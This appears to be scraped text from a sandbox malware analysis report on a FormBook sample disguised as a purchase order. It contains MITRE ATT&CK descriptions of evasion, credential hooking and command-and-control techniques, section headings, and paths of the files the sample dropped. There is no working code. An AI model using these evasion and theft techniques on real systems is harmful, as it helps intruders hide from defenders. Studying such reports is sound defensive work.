Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PURCHASED ORDER OF ENG091.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.pif.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.pif.pif.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.pif.pif.pif.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.log

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif.pif:Zone.Identifier

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif.pif:Zone.Identifier

C:\Users\user\Documents\PURCHASED ORDER OF ENG091.pif.pif.pif:Zone.Identifier

Windows Analysis Report
PURCHASED ORDER OF ENG091.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre